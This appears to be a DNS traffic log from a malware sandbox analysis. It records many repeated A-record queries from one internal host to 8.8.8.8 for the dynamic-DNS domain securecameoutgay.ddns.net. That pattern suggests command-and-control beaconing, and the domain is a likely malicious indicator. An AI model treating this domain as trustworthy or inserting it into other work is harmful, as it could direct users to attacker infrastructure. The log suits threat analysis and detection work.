                                                    Oct 12, 2024 23:06:06.966223955 CEST192.168.2.148.8.8.80x9804Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.973155975 CEST192.168.2.148.8.8.80xca21Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.980110884 CEST192.168.2.148.8.8.80xca21Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.987687111 CEST192.168.2.148.8.8.80xca21Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.994921923 CEST192.168.2.148.8.8.80xca21Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.001733065 CEST192.168.2.148.8.8.80xca21Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.009872913 CEST192.168.2.148.8.8.80xb1c8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.017368078 CEST192.168.2.148.8.8.80xb1c8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.024494886 CEST192.168.2.148.8.8.80xb1c8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.031747103 CEST192.168.2.148.8.8.80xb1c8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.039098024 CEST192.168.2.148.8.8.80xb1c8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.047422886 CEST192.168.2.148.8.8.80x761eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.056106091 CEST192.168.2.148.8.8.80x761eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.063191891 CEST192.168.2.148.8.8.80x761eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.070703030 CEST192.168.2.148.8.8.80x761eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.077773094 CEST192.168.2.148.8.8.80x761eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.084920883 CEST192.168.2.148.8.8.80xbdfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.091813087 CEST192.168.2.148.8.8.80xbdfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.099206924 CEST192.168.2.148.8.8.80xbdfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.105849981 CEST192.168.2.148.8.8.80xbdfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.112242937 CEST192.168.2.148.8.8.80xbdfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.119040966 CEST192.168.2.148.8.8.80x6384Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.125916004 CEST192.168.2.148.8.8.80x6384Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.132657051 CEST192.168.2.148.8.8.80x6384Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.139086008 CEST192.168.2.148.8.8.80x6384Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.146187067 CEST192.168.2.148.8.8.80x6384Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.152982950 CEST192.168.2.148.8.8.80x8eebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.159555912 CEST192.168.2.148.8.8.80x8eebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.166438103 CEST192.168.2.148.8.8.80x8eebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.173316002 CEST192.168.2.148.8.8.80x8eebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.180852890 CEST192.168.2.148.8.8.80x8eebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.188000917 CEST192.168.2.148.8.8.80xbc1bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.202186108 CEST192.168.2.148.8.8.80xbc1bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.208777905 CEST192.168.2.148.8.8.80xbc1bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.215749025 CEST192.168.2.148.8.8.80xbc1bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.223004103 CEST192.168.2.148.8.8.80xbc1bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.230531931 CEST192.168.2.148.8.8.80x8f72Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.238176107 CEST192.168.2.148.8.8.80x8f72Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.246072054 CEST192.168.2.148.8.8.80x8f72Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.253539085 CEST192.168.2.148.8.8.80x8f72Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.260404110 CEST192.168.2.148.8.8.80x8f72Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.267167091 CEST192.168.2.148.8.8.80x41e6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.277434111 CEST192.168.2.148.8.8.80x41e6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.284969091 CEST192.168.2.148.8.8.80x41e6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.291465044 CEST192.168.2.148.8.8.80x41e6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.298253059 CEST192.168.2.148.8.8.80x41e6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.305670977 CEST192.168.2.148.8.8.80xa16fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.312537909 CEST192.168.2.148.8.8.80xa16fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.319726944 CEST192.168.2.148.8.8.80xa16fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.327419996 CEST192.168.2.148.8.8.80xa16fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.334820986 CEST192.168.2.148.8.8.80xa16fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.341941118 CEST192.168.2.148.8.8.80x3032Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.348926067 CEST192.168.2.148.8.8.80x3032Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.355534077 CEST192.168.2.148.8.8.80x3032Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.362206936 CEST192.168.2.148.8.8.80x3032Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.368782043 CEST192.168.2.148.8.8.80x3032Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.375495911 CEST192.168.2.148.8.8.80xd540Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.382627964 CEST192.168.2.148.8.8.80xd540Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.389652967 CEST192.168.2.148.8.8.80xd540Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.396780968 CEST192.168.2.148.8.8.80xd540Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.403970003 CEST192.168.2.148.8.8.80xd540Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.411026955 CEST192.168.2.148.8.8.80x733bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.417741060 CEST192.168.2.148.8.8.80x733bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.424736977 CEST192.168.2.148.8.8.80x733bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.431602955 CEST192.168.2.148.8.8.80x733bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.439022064 CEST192.168.2.148.8.8.80x733bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.445909977 CEST192.168.2.148.8.8.80x7f32Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.452950954 CEST192.168.2.148.8.8.80x7f32Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.459696054 CEST192.168.2.148.8.8.80x7f32Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.466330051 CEST192.168.2.148.8.8.80x7f32Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.473278046 CEST192.168.2.148.8.8.80x7f32Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.480798960 CEST192.168.2.148.8.8.80xed9fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.488193989 CEST192.168.2.148.8.8.80xed9fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.496747971 CEST192.168.2.148.8.8.80xed9fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.503353119 CEST192.168.2.148.8.8.80xed9fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.510191917 CEST192.168.2.148.8.8.80xed9fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.517844915 CEST192.168.2.148.8.8.80x7fa3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.525650024 CEST192.168.2.148.8.8.80x7fa3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.533544064 CEST192.168.2.148.8.8.80x7fa3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.540520906 CEST192.168.2.148.8.8.80x7fa3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.547441006 CEST192.168.2.148.8.8.80x7fa3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.556452990 CEST192.168.2.148.8.8.80x932bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.563659906 CEST192.168.2.148.8.8.80x932bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.571078062 CEST192.168.2.148.8.8.80x932bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.578378916 CEST192.168.2.148.8.8.80x932bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.585666895 CEST192.168.2.148.8.8.80x932bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.593105078 CEST192.168.2.148.8.8.80x1fabStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.600902081 CEST192.168.2.148.8.8.80x1fabStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.609375000 CEST192.168.2.148.8.8.80x1fabStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.616920948 CEST192.168.2.148.8.8.80x1fabStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.624104977 CEST192.168.2.148.8.8.80x1fabStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.631047010 CEST192.168.2.148.8.8.80xae7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.638680935 CEST192.168.2.148.8.8.80xae7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.646135092 CEST192.168.2.148.8.8.80xae7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.653604984 CEST192.168.2.148.8.8.80xae7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.660586119 CEST192.168.2.148.8.8.80xae7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.672947884 CEST192.168.2.148.8.8.80xee68Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.681195021 CEST192.168.2.148.8.8.80xee68Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.688497066 CEST192.168.2.148.8.8.80xee68Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.695578098 CEST192.168.2.148.8.8.80xee68Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.703414917 CEST192.168.2.148.8.8.80xee68Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.710942030 CEST192.168.2.148.8.8.80x4358Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.718601942 CEST192.168.2.148.8.8.80x4358Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.726425886 CEST192.168.2.148.8.8.80x4358Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.733448982 CEST192.168.2.148.8.8.80x4358Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.740823984 CEST192.168.2.148.8.8.80x4358Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.748280048 CEST192.168.2.148.8.8.80xccdaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.755440950 CEST192.168.2.148.8.8.80xccdaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.763129950 CEST192.168.2.148.8.8.80xccdaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.770030975 CEST192.168.2.148.8.8.80xccdaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.777471066 CEST192.168.2.148.8.8.80xccdaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.784796953 CEST192.168.2.148.8.8.80xafcdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.793656111 CEST192.168.2.148.8.8.80xafcdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.801258087 CEST192.168.2.148.8.8.80xafcdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.808346033 CEST192.168.2.148.8.8.80xafcdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.815644979 CEST192.168.2.148.8.8.80xafcdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.823061943 CEST192.168.2.148.8.8.80x7877Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.830246925 CEST192.168.2.148.8.8.80x7877Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.837757111 CEST192.168.2.148.8.8.80x7877Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.845247984 CEST192.168.2.148.8.8.80x7877Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.851949930 CEST192.168.2.148.8.8.80x7877Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.859314919 CEST192.168.2.148.8.8.80x6fd1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.866281986 CEST192.168.2.148.8.8.80x6fd1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.873301029 CEST192.168.2.148.8.8.80x6fd1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.880151987 CEST192.168.2.148.8.8.80x6fd1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.887109995 CEST192.168.2.148.8.8.80x6fd1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.893882990 CEST192.168.2.148.8.8.80xc2fcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.901998043 CEST192.168.2.148.8.8.80xc2fcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.910250902 CEST192.168.2.148.8.8.80xc2fcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.917645931 CEST192.168.2.148.8.8.80xc2fcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.924937963 CEST192.168.2.148.8.8.80xc2fcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.932657003 CEST192.168.2.148.8.8.80xeae5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.939723969 CEST192.168.2.148.8.8.80xeae5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.946321011 CEST192.168.2.148.8.8.80xeae5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.953099966 CEST192.168.2.148.8.8.80xeae5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.960120916 CEST192.168.2.148.8.8.80xeae5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.967111111 CEST192.168.2.148.8.8.80xba86Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.974368095 CEST192.168.2.148.8.8.80xba86Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.981592894 CEST192.168.2.148.8.8.80xba86Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.988811016 CEST192.168.2.148.8.8.80xba86Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:07.995546103 CEST192.168.2.148.8.8.80xba86Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.003196955 CEST192.168.2.148.8.8.80x176Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.010153055 CEST192.168.2.148.8.8.80x176Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.017054081 CEST192.168.2.148.8.8.80x176Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.024074078 CEST192.168.2.148.8.8.80x176Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.031251907 CEST192.168.2.148.8.8.80x176Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.038480043 CEST192.168.2.148.8.8.80xe36dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.045828104 CEST192.168.2.148.8.8.80xe36dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.053461075 CEST192.168.2.148.8.8.80xe36dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.060421944 CEST192.168.2.148.8.8.80xe36dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.067873955 CEST192.168.2.148.8.8.80xe36dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.075052977 CEST192.168.2.148.8.8.80xd3b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.082495928 CEST192.168.2.148.8.8.80xd3b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.089581013 CEST192.168.2.148.8.8.80xd3b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.096729994 CEST192.168.2.148.8.8.80xd3b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.103905916 CEST192.168.2.148.8.8.80xd3b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.111110926 CEST192.168.2.148.8.8.80x64c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.118050098 CEST192.168.2.148.8.8.80x64c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.125606060 CEST192.168.2.148.8.8.80x64c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.132565975 CEST192.168.2.148.8.8.80x64c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.139009953 CEST192.168.2.148.8.8.80x64c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.146086931 CEST192.168.2.148.8.8.80xc80fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.153101921 CEST192.168.2.148.8.8.80xc80fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.160545111 CEST192.168.2.148.8.8.80xc80fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.167756081 CEST192.168.2.148.8.8.80xc80fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.175059080 CEST192.168.2.148.8.8.80xc80fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.182457924 CEST192.168.2.148.8.8.80xdadaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.190080881 CEST192.168.2.148.8.8.80xdadaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.197165966 CEST192.168.2.148.8.8.80xdadaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.204334974 CEST192.168.2.148.8.8.80xdadaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.211783886 CEST192.168.2.148.8.8.80xdadaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.219501972 CEST192.168.2.148.8.8.80x53abStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.226586103 CEST192.168.2.148.8.8.80x53abStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.234253883 CEST192.168.2.148.8.8.80x53abStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.242185116 CEST192.168.2.148.8.8.80x53abStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.250174999 CEST192.168.2.148.8.8.80x53abStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.258008003 CEST192.168.2.148.8.8.80xec6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.266110897 CEST192.168.2.148.8.8.80xec6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.273340940 CEST192.168.2.148.8.8.80xec6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.280874968 CEST192.168.2.148.8.8.80xec6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.288259983 CEST192.168.2.148.8.8.80xec6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.294986010 CEST192.168.2.148.8.8.80xee9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.302069902 CEST192.168.2.148.8.8.80xee9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.309526920 CEST192.168.2.148.8.8.80xee9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.316915989 CEST192.168.2.148.8.8.80xee9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.323441029 CEST192.168.2.148.8.8.80xee9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.330523968 CEST192.168.2.148.8.8.80x3cf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.337464094 CEST192.168.2.148.8.8.80x3cf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
